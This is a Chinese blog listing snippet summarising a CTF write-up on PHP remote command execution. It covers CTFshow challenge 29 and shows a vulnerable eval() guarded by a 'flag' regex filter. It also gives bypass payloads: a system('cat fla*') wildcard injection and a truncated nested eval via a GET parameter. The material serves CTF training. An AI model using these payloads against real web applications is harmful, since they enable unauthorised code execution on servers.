2024年2月24日
CTFer——RCE命令执行漏洞
摘要: 例题总结: CTFshow 29: if(!preg_match("/flag/i", $c)){ eval($c); (eval内执行的是php代码,必须以分号结尾) 绕过方式: (1)?c=system("cat%20fla*"); fla* 代替flag (2) ?c=eval($_GET[1 阅读全文
posted @ 2024-02-24 21:06 Heck1ng 阅读(689) 评论(0) 推荐(0)